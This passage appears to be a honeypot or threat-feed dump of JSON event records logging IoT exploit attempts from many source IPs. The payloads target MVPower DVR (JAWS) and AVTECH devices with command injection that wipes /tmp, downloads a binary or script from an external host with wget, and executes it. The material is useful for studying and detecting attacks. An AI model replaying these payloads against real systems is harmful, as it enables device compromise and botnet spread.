- "last_seen": "2020-06-05T00:31:06Z"
- },
- {
- "event_id": "86e1e3c1a1ef6311aaceb0d64f14f9f05c1c96818fd63cfb713e0b7f8b633511",
- "source_ip_address": "170.81.252.206",
- "country": "CO",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T21:59:49Z",
- "last_seen": "2020-06-04T21:59:49Z"
- },
- {
- "event_id": "93cba6bb49a0a13ca44ef917e4de34bf1c481ea251f8961b37f18ac79ff69604",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5900,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:25:52Z",
- "last_seen": "2020-06-04T18:25:52Z"
- },
- {
- "event_id": "3517649065a6bce7e34b6ae076f2c422ea7619a8a52a5b1cc9bbc667e287bb01",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5900,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:25:50Z",
- "last_seen": "2020-06-04T18:25:50Z"
- },
- {
- "event_id": "3b3ca5df830c6fe552a25d1a9443f440d714acf9a33bad46e52bc361667b97ce",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10243,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:25:50Z",
- "last_seen": "2020-06-04T18:25:50Z"
- },
- {
- "event_id": "4d6245210abce7e3fead8b08428492c99f69d9847e348320c2e5507b9a464ade",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 2083,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:25:20Z",
- "last_seen": "2020-06-04T18:25:20Z"
- },
- {
- "event_id": "af2ec8f7d4b04c9561e5f2f24714997ae461039a8b0aa97afdea74728cc42000",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 37777,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-04T18:23:42Z",
- "last_seen": "2020-06-04T18:23:42Z"
- },
- {
- "event_id": "dcd978c7825e00c9dcc3e00af2fb2dc5e73f30025d26453d55d61c801786c96d",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 37777,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-04T18:23:39Z",
- "last_seen": "2020-06-04T18:23:40Z"
- },
- {
- "event_id": "89c96c76e613f50d2ee4c9c03d16fefd86716b16aa42574b8d28da5eb8b6b3a5",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:23:35Z",
- "last_seen": "2020-06-04T18:23:35Z"
- },
- {
- "event_id": "f5eef8cd378f0a4a5b6cae60c17ac3943c24e94c3931a2255fed27da314a88ca",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:32Z",
- "last_seen": "2020-06-04T18:21:32Z"
- },
- {
- "event_id": "543307266a3128a477476417a2954ddd35b98242b4b1c8419baa68324ba07a76",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8139,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:31Z",
- "last_seen": "2020-06-04T18:21:31Z"
- },
- {
- "event_id": "4f48ba60b134045b75d8883d4e0ca73582875398590e82d900d6733cab126d55",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:30Z",
- "last_seen": "2020-06-04T18:21:30Z"
- },
- {
- "event_id": "43c77027f3a4d60329e8fbdfe706c81539a6d8ab9a91e450aba833d5491069bc",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:28Z",
- "last_seen": "2020-06-04T18:21:28Z"
- },
- {
- "event_id": "e8f87fda94282addd286eea0e25b86a5d4c13efd41053c44464c726ee5861f25",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:28Z",
- "last_seen": "2020-06-04T18:21:28Z"
- },
- {
- "event_id": "7ee7426e81e8b85e5906e7a0be30170665e557309a9689c92790e90c49e53566",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:27Z",
- "last_seen": "2020-06-04T18:21:27Z"
- },
- {
- "event_id": "728967da2b1eb60e5e88a44b62667d2658edb3cd78c644646feb85dab3a0a5d0",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7547,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:25Z",
- "last_seen": "2020-06-04T18:21:25Z"
- },
- {
- "event_id": "6f119d20bb14b5fd6b6a91201de67c55c5da2ef0c75eb16cce98eb51f77ad1f5",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:21:25Z",
- "last_seen": "2020-06-04T18:21:25Z"
- },
- {
- "event_id": "02e2885a28ad75601c5d92aa374cde453b4311171ebf54a12a755c6420c4afad",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:20:54Z",
- "last_seen": "2020-06-04T18:20:54Z"
- },
- {
- "event_id": "6e2b652e62726a17ddc5e76fd347e2fb1537f7c8ca7bdb13382da66b0e5aa6f0",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8291,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:20:52Z",
- "last_seen": "2020-06-04T18:20:52Z"
- },
- {
- "event_id": "20f4fa439b9325cebb9fa722b644003121ef26075d70162be3f7f73e6f3cdae3",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:20:49Z",
- "last_seen": "2020-06-04T18:20:49Z"
- },
- {
- "event_id": "458b4aa0ec58a05b761a86ba269f1bf48010d7c0cbf341414509c85af3b27a2c",
- "source_ip_address": "159.203.191.246",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 37.8UsA.sh; chmod 777 37.8UsA.sh; sh 37.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8888,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T18:20:47Z",
- "last_seen": "2020-06-04T18:20:47Z"
- },
- {
- "event_id": "aeefc616c5b7795d5fa6acbbb1136ffd669818f51cb5f45a046aebd9aa64c8b4",
- "source_ip_address": "82.255.38.238",
- "country": "FR",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-04T17:07:42Z",
- "last_seen": "2020-06-04T17:07:42Z"
- },
- {
- "event_id": "52e91f4a9e825feb284787eef41e3195452f343a8e6de9c777887836136f04b0",
- "source_ip_address": "70.45.130.159",
- "country": "PR",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2020-06-04T03:01:51Z",
- "last_seen": "2020-06-04T03:01:56Z"
- },
- {
- "event_id": "0afde771b622de4a81946aa70564340db871f83887d4704ad632b46de0b56af3",
- "source_ip_address": "118.69.109.149",
- "country": "VN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T19:50:36Z",
- "last_seen": "2020-06-03T19:50:36Z"
- },
- {
- "event_id": "ef5cff075d809f2474e702d1b31d242084fb2db665c1fe59b9df2e811cc0778d",
- "source_ip_address": "186.182.83.148",
- "country": "AR",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T14:00:43Z",
- "last_seen": "2020-06-03T14:00:43Z"
- },
- {
- "event_id": "1c3caccec600ec55e95fa523460f2c0ec1379042b16bd91ca24aedc06ad50af5",
- "source_ip_address": "181.120.188.61",
- "country": "PY",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T13:54:09Z",
- "last_seen": "2020-06-03T13:54:09Z"
- },
- {
- "event_id": "70913fd2ff6566c27c6174634eae273a4484a1661b1323d9d37c3e9bd9f3cc5f",
- "source_ip_address": "24.55.185.28",
- "country": "PR",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T09:41:26Z",
- "last_seen": "2020-06-03T09:41:26Z"
- },
- {
- "event_id": "97d16848ee5bbe427eb9fa7b7619ad15a2999f5d0c81d67de0472af2899db31e",
- "source_ip_address": "79.11.150.217",
- "country": "IT",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T08:38:35Z",
- "last_seen": "2020-06-03T08:38:35Z"
- },
- {
- "event_id": "358ee8b9db1d454fdeadafff67f26f779eea5a08b452d12dd95b124697103b0b",
- "source_ip_address": "103.59.214.238",
- "country": "IN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T08:35:16Z",
- "last_seen": "2020-06-03T08:35:16Z"
- },
- {
- "event_id": "4e5d11659b234c23b5874ce5bf09cf286140777572879e7d2c28914682c00bfb",
- "source_ip_address": "200.188.153.18",
- "country": "MX",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 w00dy.jaws HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-06-03T06:12:18Z",
- "last_seen": "2020-06-03T08:01:18Z"
- },
- {
- "event_id": "fb4b5d2fdd3818cfad2381b821034e6b87e9dfd0958d3b9bd750c07a3afc47fc",
- "source_ip_address": "120.29.125.227",
- "country": "PH",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-03T07:36:53Z",
- "last_seen": "2020-06-03T07:36:53Z"
- },
- {
- "event_id": "a03406ccc9c75dbe34d20072825b99d88397bb350089c9f4b08b3161d60e5430",
- "source_ip_address": "203.76.98.139",
- "country": "BD",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-02T14:08:38Z",
- "last_seen": "2020-06-02T14:08:38Z"
- },
- {
- "event_id": "16eeeadb884ab067e2bfc4716e87d20a838973a92dfd4876903d4465e9a81ca1",
- "source_ip_address": "95.218.92.20",
- "country": "SA",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-02T12:20:47Z",
- "last_seen": "2020-06-02T12:20:47Z"
- },
- {
- "event_id": "af7fe9e242c67f8f69bfeafa8dd82f56446df140aeb1ca7283043f44dedb402e",
- "source_ip_address": "24.218.229.102",
- "country": "US",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-02T04:30:25Z",
- "last_seen": "2020-06-02T04:30:25Z"
- },
- {
- "event_id": "98ae27d3e7bba44679945b2b44d1e8577cb0e6beb5f4bc4e3111c5d9d0e34a6c",
- "source_ip_address": "122.176.27.17",
- "country": "IN",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-02T00:43:28Z",
- "last_seen": "2020-06-02T00:43:28Z"
- },
- {
- "event_id": "aef5fcda2410f405079b120ae518e80968453c696502a8a5bbe12ef0b960b805",
- "source_ip_address": "80.15.136.218",
- "country": "FR",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T22:48:00Z",
- "last_seen": "2020-06-01T22:48:00Z"
- },
- {
- "event_id": "5972d92049bb5fa0e3f95853034afc0225ce129711ad127d88f3b77265c9c213",
- "source_ip_address": "42.61.13.174",
- "country": "SG",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T10:16:00Z",
- "last_seen": "2020-06-01T10:16:00Z"
- },
- {
- "event_id": "6e04d00b68510cd9e732554af70cefaa1da35f7ffaf112e7b325798b68e24b17",
- "source_ip_address": "116.206.59.195",
- "country": "BD",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T08:43:00Z",
- "last_seen": "2020-06-01T08:43:00Z"
- },
- {
- "event_id": "c6cf520402a73bb76fe2a9c7088dff549091493db575f34252bb592c27a1d02b",
- "source_ip_address": "103.78.141.187",
- "country": "ID",
- "user_agent": "Hello, world",
- "payload": "GET /shell?cd /tmp;rm -rf *;wget 185.172.111.214/bins/UnHAnaAW.x86;chmod 777 /tmp/UnHAnaAW.x86;sh /tmp/UnHAnaAW.x86 HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "MVPower DVR (JAWS Web Server) RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T07:54:47Z",
- "last_seen": "2020-06-01T07:54:47Z"
- },
- {
- "event_id": "5f6ee736fb8c7f46625298061777c5069aa75f5721ee36620c41589571633572",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh )&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10243,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-06-01T05:45:24Z",
- "last_seen": "2020-06-01T05:45:24Z"
- },
- {
- "event_id": "a3f26f223fa2a0b50d39b40704ef31c18bacdcde40744234bde3b65bf763d5e6",
- "source_ip_address": "193.142.146.34",
- "country": "NL",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 2.8UsA.sh; chmod 777 2.8UsA.sh; sh 2.8UsA.sh ; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4242,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
